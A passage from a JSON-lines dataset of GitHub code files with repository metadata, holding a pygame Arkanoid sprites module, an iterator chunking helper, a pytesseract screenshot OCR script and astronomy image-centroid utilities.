"usage_type": "attribute"}, {"api_name": "json.load", "line_number": 23, "usage_type": "call"}, {"api_name": "markdown.markdown", "line_number": 27, "usage_type": "call"}, {"api_name": "bottle.Bottle", "line_number": 29, "usage_type": "call"}, {"api_name": "requests.get", "line_number": 46, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 47, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 47, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 48, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 48, "usage_type": "name"}, {"api_name": "lxml.etree.XMLParser", "line_number": 51, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 51, "usage_type": "name"}, {"api_name": "lxml.etree.fromstring", "line_number": 52, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 52, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 59, "usage_type": "call"}, {"api_name": "io.BytesIO", "line_number": 60, "usage_type": "call"}, {"api_name": "messytables.CSVTableSet", "line_number": 62, "usage_type": "call"}, {"api_name": "messytables.headers_guess", "line_number": 64, "usage_type": "call"}, {"api_name": "messytables.headers_processor", "line_number": 65, "usage_type": "call"}, {"api_name": "messytables.offset_processor", "line_number": 66, "usage_type": "call"}, {"api_name": "messytables.type_guess", "line_number": 67, "usage_type": "call"}, {"api_name": "messytables.types_processor", "line_number": 68, "usage_type": "call"}, {"api_name": "re.split", "line_number": 71, "usage_type": "call"}, {"api_name": "lxml.etree.Element", "line_number": 73, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 73, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 74, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 74, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 75, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 75, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 76, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 76, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 77, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 77, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 78, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 78, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 79, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 79, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 80, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 80, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 81, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 81, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 82, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 82, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 87, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 87, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 92, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 92, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 99, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 99, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 105, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 105, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 106, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 106, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 107, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 107, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 114, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 114, "usage_type": "name"}, {"api_name": "lxml.etree.Element", "line_number": 117, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 117, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 121, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 121, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 129, "usage_type": "call"}, {"api_name": "lxml.etree.fromstring", "line_number": 130, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 130, "usage_type": "name"}, {"api_name": "lxml.etree.parse", "line_number": 131, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 131, "usage_type": "name"}, {"api_name": "lxml.etree.XSLT", "line_number": 132, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 132, "usage_type": "name"}, {"api_name": "lxml.etree.fromstring", "line_number": 133, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 133, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 140, "usage_type": "call"}, {"api_name": "lxml.etree.Element", "line_number": 145, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 145, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 146, "usage_type": "call"}, {"api_name": "lxml.etree.SubElement", "line_number": 148, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 148, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 149, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 149, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 150, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 150, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 151, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 151, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 152, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 152, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 153, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 153, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 154, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 154, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 167, "usage_type": "call"}, {"api_name": "lxml.etree.SubElement", "line_number": 171, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 171, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 172, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 172, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 177, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 177, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 181, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 181, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 189, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 189, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 195, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 195, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 196, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 196, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 198, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 198, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 201, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 201, "usage_type": "name"}, {"api_name": "lxml.etree.SubElement", "line_number": 203, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 203, "usage_type": "name"}, {"api_name": "bottle.request.params", "line_number": 216, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 216, "usage_type": "name"}, {"api_name": "bottle.request.params", "line_number": 217, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 217, "usage_type": "name"}, {"api_name": "bottle.request.params", "line_number": 218, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 218, "usage_type": "name"}, {"api_name": "bottle.request.params", "line_number": 219, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 219, "usage_type": "name"}, {"api_name": "bottle.abort", "line_number": 222, "usage_type": "call"}, {"api_name": "bottle.abort", "line_number": 225, "usage_type": "call"}, {"api_name": "bottle.abort", "line_number": 228, "usage_type": "call"}, {"api_name": "bottle.abort", "line_number": 231, "usage_type": "call"}, {"api_name": "bottle.abort", "line_number": 234, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 236, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 237, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 238, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 239, "usage_type": "call"}, {"api_name": "lxml.etree.Element", "line_number": 242, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 242, "usage_type": "name"}, {"api_name": "logging.error", "line_number": 253, "usage_type": "call"}, {"api_name": "bottle.abort", "line_number": 254, "usage_type": "call"}, {"api_name": "logging.error", "line_number": 267, "usage_type": "call"}, {"api_name": "bottle.abort", "line_number": 268, "usage_type": "call"}, {"api_name": "bottle.response.content_type", "line_number": 273, "usage_type": "attribute"}, {"api_name": "bottle.response", "line_number": 273, "usage_type": "name"}, {"api_name": "lxml.etree.tostring", "line_number": 274, "usage_type": "call"}, {"api_name": "lxml.etree", "line_number": 274, "usage_type": "name"}, {"api_name": "bottle.run", "line_number": 276, "usage_type": "call"}]} +{"seq_id": "33544801539", "text": "import pygame\nfrom settings import *\nfrom pygame import Vector2\nimport random\n\n\nclass Brick(pygame.sprite.Sprite):\n def __init__(self, game, x, y, drop):\n self.groups = game.bricks\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.drop = drop\n if drop:\n self.image = random.choice(game.glossy_brick_images)\n self.rect = self.image.get_rect()\n else:\n self.image = random.choice(game.brick_images)\n self.rect = self.image.get_rect()\n self.rect.center = Vector2(x, y)\n \n def destroy(self):\n self.game.break_fx.play()\n self.kill()\n \n def drop_powerup(self):\n if self.drop:\n Item(self.game, self.rect.centerx, self.rect.centery)\n\n \nclass Item(pygame.sprite.Sprite):\n def __init__(self,game, x, y):\n self.groups = game.items\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = self.game.powerup_img\n self.rect = self.image.get_rect()\n self.rect.center = Vector2(x,y)\n self.velocity = Vector2(0, 100)\n \n def update(self):\n self.rect.centerx += self.velocity.x \n self.rect.centery += 1\n self.check_hits()\n\n def check_hits(self):\n hits = pygame.sprite.spritecollide(self, self.game.players, False)\n if len(hits) > 0:\n self.picked_by()\n self.kill()\n self.game.powerup_fx.play()\n\n def picked_by(self):\n self.game.powerup_multiball()\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(self, game, x , y):\n self.game = game\n self.groups = game.players\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.image = game.pad_img\n self.rect = self.image.get_rect()\n self.rect.center = Vector2(x, y)\n self.velocity = Vector2(0, 0)\n self.acceleration = 0\n\n def update(self):\n self.keyboard_input()\n self.move()\n\n def move(self):\n self.velocity.x += self.acceleration * self.game.dt\n if self.velocity.magnitude() > PAD_MAX_SPEED:\n self.velocity.scale_to_length(PAD_MAX_SPEED)\n self.rect.centerx += self.velocity.x * self.game.dt\n self.velocity -= Vector2(self.velocity.x * DRAG * self.game.dt, 0)\n if self.velocity.magnitude() < 20:\n self.velocity.x = 0\n if self.rect.left < TILE_SIZE:\n self.rect.left = TILE_SIZE\n self.velocity.x = 0\n if self.rect.right > WIDTH - TILE_SIZE:\n self.rect.right = WIDTH - TILE_SIZE\n self.velocity.x = 0\n\n def hit(self, ball):\n offset = (ball.rect.centerx - self.rect.centerx) / (self.rect.width//2)\n ball.velocity.x = offset\n ball.rect.bottom = self.rect.top\n \n def keyboard_input(self):\n keystate = pygame.key.get_pressed()\n self.acceleration = 0\n if keystate[pygame.K_LEFT]:\n self.acceleration = -PAD_MAX_ACCEL\n if keystate[pygame.K_RIGHT]:\n self.acceleration = PAD_MAX_ACCEL\n\n\nclass Ball(pygame.sprite.Sprite):\n def __init__(self, game, x, y):\n self.groups = game.balls\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n self.image = game.ball_img\n self.rect = self.image.get_rect()\n self.rect.center = Vector2(x, y)\n self.velocity = Vector2(0, 0)\n self.is_asleep = True\n self.push = 0\n\n def bounce(self, thing):\n if self.velocity.magnitude() == 0:\n return\n velocity = self.velocity.normalize()\n is_vertical_bounce = velocity.x == 0\n if velocity.x != 0:\n v_slope = -velocity.y / velocity.x\n corner = thing.rect.center\n if v_slope > 0 and velocity.x > 0: # Q1 bottom left\n corner = thing.rect.bottomleft\n if v_slope < 0 and velocity.x < 0: # Q2 bottom right\n corner = thing.rect.bottomright\n if v_slope > 0 and velocity.x < 0: # Q3 top right\n corner = thing.rect.topright\n if v_slope < 0 and velocity.x > 0: # Q4 top left\n corner = thing.rect.topleft\n towards_thing = (Vector2(corner) -\n Vector2(self.rect.center))\n if towards_thing.magnitude() == 0:\n return\n towards_thing = towards_thing.normalize()\n if towards_thing.x == 0:\n is_vertical_bounce = True\n else:\n t_slope = towards_thing.y / towards_thing.x\n is_vertical_bounce = abs(v_slope) > abs(t_slope)\n if is_vertical_bounce:\n self.velocity.y *= -1\n else:\n self.velocity.x *= -1\n self.game.bounce_fx.play()\n self.push = 500\n \n def update(self):\n if self.is_asleep:\n if self.game.player.acceleration != 0 and self.game.player.velocity.magnitude() != 0:\n self.velocity = self.game.player.velocity.normalize() + Vector2(0, -1)\n self.is_asleep = False\n return\n\n if self.velocity.magnitude() != 0:\n self.rect.center += self.velocity.normalize() * (BALL_SPEED + self.push) * self.game.dt\n self.push *= 0.9\n\n if self.rect.right > WIDTH - TILE_SIZE:\n self.rect.right = WIDTH - TILE_SIZE\n self.velocity.x *= -1\n\n if self.rect.left < 0 + TILE_SIZE:\n self.rect.left = 0 + TILE_SIZE\n self.velocity.x *= -1\n\n if self.rect.top < 0 + TILE_SIZE:\n self.rect.top = 0 + TILE_SIZE\n self.velocity.y *= -1\n\n if self.rect.centery > HEIGHT:\n self.kill()\n self.game.any_ball_alive()\n\n\nclass Wall(pygame.sprite.Sprite):\n def __init__(self, game, x, y, stage):\n self.groups = game.walls\n pygame.sprite.Sprite.__init__(self, self.groups)\n self.game = game\n if stage == 1:\n self.image = game.stage1_border\n self.rect = self.image.get_rect()\n elif stage == 2:\n self.image = game.stage2_border\n self.rect = self.image.get_rect()\n elif stage == 3:\n self.image = game.stage3_border\n self.rect = self.image.get_rect()\n else:\n self.image = game.stage4_border\n self.rect = self.image.get_rect()\n self.rect.x = x * TILE_SIZE\n self.rect.y = y * TILE_SIZE\n\n\nclass BackGround(pygame.sprite.Sprite):\n def __init__(self, game):\n pygame.sprite.Sprite.__init__(self)\n self.game = game\n if game.stage == 0:\n self.image = game.wallpaper_img\n self.rect = self.image.get_rect()\n if game.stage == 1:\n self.image = game.bg_1_img\n self.rect = self.image.get_rect()\n if game.stage == 2:\n self.image = game.bg_2_img\n self.rect = self.image.get_rect()\n if game.stage == 3:\n self.image = game.bg_3_img\n self.rect = self.image.get_rect()\n if game.stage == 4:\n self.image = game.bg_4_img\n self.rect = self.image.get_rect()\n if game.stage == 5:\n self.image = game.victory_img\n self.rect = self.image.get_rect()", "repo_name": "viicttor96/Practica-Arkanoid-Python", "sub_path": "sprites.py", "file_name": "sprites.py", "file_ext": "py", "file_size_in_byte": 7335, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.sprite", "line_number": 7, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 10, "usage_type": "attribute"}, {"api_name": "random.choice", "line_number": 14, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 17, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 33, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 33, "usage_type": "attribute"}, {"api_name": "pygame.Vector2", "line_number": 37, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 38, "usage_type": "call"}, {"api_name": "pygame.sprite.spritecollide", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 56, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 60, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 60, "usage_type": "attribute"}, {"api_name": "pygame.Vector2", "line_number": 63, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 64, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 76, "usage_type": "call"}, {"api_name": "pygame.key.get_pressed", "line_number": 92, "usage_type": "call"}, {"api_name": "pygame.key", "line_number": 92, "usage_type": "attribute"}, {"api_name": "pygame.K_LEFT", "line_number": 94, "usage_type": "attribute"}, {"api_name": "pygame.K_RIGHT", "line_number": 96, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 100, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 103, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 103, "usage_type": "attribute"}, {"api_name": "pygame.Vector2", "line_number": 107, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 108, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 128, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 129, "usage_type": "call"}, {"api_name": "pygame.Vector2", "line_number": 148, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 173, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 176, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 176, "usage_type": "attribute"}, {"api_name": "pygame.sprite", "line_number": 194, "usage_type": "attribute"}, {"api_name": "pygame.sprite.Sprite.__init__", "line_number": 196, "usage_type": "call"}, {"api_name": "pygame.sprite", "line_number": 196, "usage_type": "attribute"}]} +{"seq_id": "13588000979", "text": "\"\"\"Iterator utilities.\"\"\"\nimport itertools\n\n\ndef chunker(iterable, chunk_size):\n \"\"\"\n A chunker for iterators.\n\n Args:\n iterable (iterable-like): the iterable to be chunked.\n chunk_size (int): size of the chunk.\n Returns:\n A chunked iterator.\n \"\"\"\n iterator = iter(iterable)\n while True:\n chunk = tuple(\n itertools.islice(\n iterator,\n chunk_size\n )\n )\n if not chunk:\n return\n yield chunk\n", "repo_name": "drugilsberg/uniprot_fasta_parser", "sub_path": "upfp/iterator.py", "file_name": "iterator.py", "file_ext": "py", "file_size_in_byte": 514, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "itertools.islice", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "73888222564", "text": "# -*- coding:utf-8 -*-\n# @Time : 2020/5/29 10:11 \n# @Author : litao\n\nfrom PIL import Image\nimport pytesseract,os,re\nimport cv2\nimport argparse\nimport cv2\nimport os\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--preprocess\", type=str, default=\"thresh\",\n\thelp=\"type of preprocessing to be done\")\nargs = vars(ap.parse_args())\nclass Languages:\n CHS = 'chi_sim'\n ENG = 'eng'\n\ndef img_to_str(image_path, lang=Languages.CHS):\n # img = Image.open(image_path)\n # width, height = img.size\n # img.show()\n # mode = img.mode\n\n # print(img.size)\n # thumb = img.crop((10,42,160,150))\n # img.grab(0,0,250,200)\n # thumb.save(\"thumb.jpg\")\n # image = cv2.imread(image_path)\n # gray = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)\n # # check to see if we should apply thresholding to preprocess the\n # # image\n # if args[\"preprocess\"] == \"thresh\":\n # gray = cv2.threshold(gray, 0, 255,\n # cv2.THRESH_BINARY | cv2.THRESH_OTSU)[1]\n # # make a check to see if median blurring should be done to remove\n # # noise\n # elif args[\"preprocess\"] == \"blur\":\n # gray = cv2.medianBlur(gray, 3)\n # # write the grayscale image to disk as a temporary file so we can\n # # apply OCR to it\n # filename = \"thumb.png\"\n # cv2.imwrite(filename, gray)\n # thumb = img.crop((40, 30, 100, 70))\n #img.grab((30, 30, 150, 80))\n # thumb.save(\"thumb.jpg\")\n # ,config=\"-psm 7 digits\"\n img = Image.open(image_path)\n # thumb = img.crop((10,42,160,150))\n # thumb = img.crop((40, 30, 100, 70))\n thumb = img.crop((490, 0, 560, 60))\n thumb.save(\"thumb.jpg\")\n return pytesseract.image_to_string(thumb, lang,config=\"-psm 7 digits\")\n\ndef file_path_scan(file_path):\n for filename in os.listdir(file_path):\n path = os.path.join(file_path, filename)\n if not os.path.isfile(path):\n continue\n title = img_to_str(path, lang=Languages.CHS)\n print(title)\n try:\n play_count = re.findall(\"\\d+\",title)[0]\n #print(play_count)\n except:\n #print(title)\n play_count= 0\n yield filename,play_count\n\n\nfile_path = r'D:\\work_file\\word_file_new\\litao\\num'\nfor filename,play_count in file_path_scan(file_path):\n time_str = filename.replace(\".png\",\"\")\n time_str = time_str[0:13] +\":\"+ time_str[13:15]+\":\"+ time_str[15:]\n # print(time_str)\n print(time_str,play_count)\n\n# print(img_to_str(r'D:\\work_file\\word_file_new\\litao\\screen\\2020-04-16 202632.png', lang=Languages.CHS))", "repo_name": "litaolemo/crawler", "sub_path": "crawler_sys/tools/ocr_by_img.py", "file_name": "ocr_by_img.py", "file_ext": "py", "file_size_in_byte": 2602, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 11, "dataset": "github-code", "pt": "52", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 12, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 49, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 49, "usage_type": "name"}, {"api_name": "pytesseract.image_to_string", "line_number": 54, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "re.findall", "line_number": 64, "usage_type": "call"}]} +{"seq_id": "21687717325", "text": "import numpy as np\nfrom astropy.io import fits as pf\nfrom scipy.signal import medfilt2d as medfilt\nfrom scipy import ndimage\nimport pdb\nimport matplotlib.pyplot as plt\n\n\n''' ---------------------------------------------------------------------\nA lot of algorithms and diagnostic tools end up relying on a small\nnumber of apparently simple but actually tricky tools to find centroids, \nmask regions of images, locate features, subtract background, ...\n\nthese little tools are assembled here into a single \"library\" that \nshould be included by all programs requiring them.\n\nFrantz.\n--------------------------------------------------------------------- '''\n\ndef mkdisk(cs, c0, r0):\n ''' ------------------------------------------------------\n Create a circular mask centered on (x0,y0) in an array of\n size (xs, ys) with radius r0.\n Useful for centroid algorithms.\n ------------------------------------------------------ '''\n (xs, ys) = cs\n (x0, y0) = c0\n x,y = np.meshgrid(np.arange(xs)-x0, np.arange(ys)-y0)\n dist = np.hypot(y,x)\n mask = dist <= r0\n return mask\n\ndef mkbox(cs, c0, cd):\n ''' ------------------------------------------------------\n Create a box mask of lower corner (x0,y0) in an array of\n size (xs, ys), of dimensions (dx, dy).\n ------------------------------------------------------ '''\n (xs, ys) = cs\n (x0, y0) = c0\n (dx, dy) = cd\n x,y = np.meshgrid(np.arange(xs), np.arange(ys))\n mask = (x >= x0) * (x < x0+dx) * (y >= y0) * (y < y0+dy)\n return mask\n\ndef find_disk_center(img, diam=100):\n ''' ------------------------------------------------------\n Locate the center of a disk of given radius in img\n This algorithm minimizes the flux outside the disk\n ------------------------------------------------------ '''\n (ys, xs) = img.shape # size of \"image\"\n bmask = mkdisk((xs, ys), (xs/2, ys/2), diam/2)\n mydisk = np.zeros_like(img)\n mydisk[bmask] = 1.0\n mydisk = 1 - np.roll(np.roll(mydisk, ys/2, 0), xs/2, 1)\n \n temp = medfilt(img.copy() - np.median(img))\n temp -= temp.min()\n bval = np.sum(temp)\n\n thr = np.percentile(temp, 92) # pupil covers 8% of img surface\n temp[temp < thr] = 0.0\n temp[temp > thr] = 1.0\n\n x0, y0, x1, y1 = 0, 0, xs, ys # first iteration search area\n xcb, ycb = 0, 0\n\n stp = np.float(diam)\n\n while (stp > 0.5):\n xc = np.arange(x0, x1, stp, dtype=int)\n yc = np.arange(y0, y1, stp, dtype=int)\n for i in xrange(xc.size):\n for j in xrange(yc.size):\n mydisk = np.roll(np.roll(mydisk, xc[i], 0), yc[j], 1)\n tot_out = np.sum((mydisk) * temp)\n val = tot_out\n mydisk = np.roll(np.roll(mydisk, -xc[i], 0), -yc[j], 1)\n if (val < bval):\n bval = val\n xcb, ycb = xc[i], yc[j]\n x0, x1 = 0.5 * (x0 + xcb), 0.5 * (x1 + xcb)\n y0, y1 = 0.5 * (y0 + ycb), 0.5 * (y1 + ycb)\n stp *= 0.5\n\n mydisk = 1.0 - np.roll(np.roll(mydisk, xcb, 0), ycb, 1)\n\n return((xcb, ycb))\n\n\ndef find_psf_center(img, verbose=True, nbit=10):\n ''' -------------------------------------\n Locate the center of a psf-type image img\n ------------------------------------- '''\n temp = img.astype('float')\n bckg = np.median(temp) # background level\n temp -= bckg\n mfilt = medfilt(temp, 3) # median filtered, kernel size = 3\n (sy, sx) = mfilt.shape # size of \"image\"\n sxy = np.max([sx, sy])\n\n xc, yc = sx/2, sy/2 # first estimate for psf center\n\n signal = np.zeros_like(img)\n #signal[mfilt > bckg] = 1.0\n signal[mfilt > 0] = 1.0\n\n for it in xrange(nbit):\n #sz = sx/2/(1.0+(0.1*sx/2*it/(4*nbit)))\n sz = sxy/2/(1.0+(0.1*sxy/2*it/(4*nbit)))\n x0 = np.max([int(0.5 + xc - sz), 0])\n y0 = np.max([int(0.5 + yc - sz), 0])\n x1 = np.min([int(0.5 + xc + sz), sx])\n y1 = np.min([int(0.5 + yc + sz), sy])\n\n mask = np.zeros_like(img)\n mask[y0:y1, x0:x1] = 1.0\n\n profx = (mfilt*mask*signal).sum(axis=0)\n profy = (mfilt*mask*signal).sum(axis=1)\n \n xc = (profx*np.arange(sx)).sum() / profx.sum()\n yc = (profy*np.arange(sy)).sum() / profy.sum()\n\n if verbose:\n print(\"it #%2d center = (%.2f, %.2f)\" % (it+1, xc, yc))\n\n return (xc, yc)\n\ndef locate_speckles(img, nspk=1, xr=5.0, nbit=20):\n ''' --------------------------------\n Returns two lists of x,y coordinates \n of speckles in the image.\n parameters:\n - img : the image to be searched\n - nspk : # of speckles to profile\n - xr : exclusion radius\n -------------------------------- '''\n temp = img.copy() # to make sure we don't damage image\n mfilt = medfilt(temp, 3) # median filtered, kernel size = 3\n (ys, xs) = mfilt.shape # size of \"image\"\n spkx, spky = [], [] # speckle coordinates\n ni = 0 # number of identified speckles\n \n while (ni < nspk):\n # locate maximum in image\n x1 = mfilt.argmax() % xs\n y1 = mfilt.argmax() // xs\n # fine-tune coordinates\n m1 = mkdisk((xs, ys), (x1, y1), xr)\n if nbit == 0:\n (x11, y11) = (x1, y1)\n mfilt *= (1.0-m1)\n else:\n (x11, y11) = find_psf_center((m1) * mfilt, False, nbit)\n mfilt *= (1.0 - mkdisk((xs, ys), (x11, y11), xr))\n\n # increment counter of speckles\n spkx.append(x11)\n spky.append(y11)\n ni += 1\n\n return (spkx, spky)\n\ndef locate_speckles0(img, nspk=1, xr=5.0, nbit=20):\n mfilt = medfilt(img, 3)\n #pf.writeto('test.fits', mfilt, clobber=True)\n vmax = np.percentile(mfilt, 99.95)\n labeled, nobj = ndimage.label(mfilt > 0.99*vmax)\n if nobj > 1:\n mass = ndimage.center_of_mass(img, labeled, range(1,nspk+1))\n else:\n mass = []\n #mass = ndimage.center_of_mass(img, labeled)\n temp = np.array(mass)\n return((temp[:,1], temp[:,0]))\n\n", "repo_name": "scexao-org/Instrument-Control-Main", "sub_path": "src/lib/python/img_tools.py", "file_name": "img_tools.py", "file_ext": "py", "file_size_in_byte": 5993, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.meshgrid", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.hypot", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 41, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 54, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt2d", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 56, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.percentile", "line_number": 60, "usage_type": "call"}, {"api_name": "numpy.float", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 70, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 74, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 75, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 77, "usage_type": "call"}, {"api_name": "numpy.roll", "line_number": 85, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 95, "usage_type": "call"}, {"api_name": "scipy.signal.medfilt2d", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 99, "usage_type": "call"}, {"api_name": 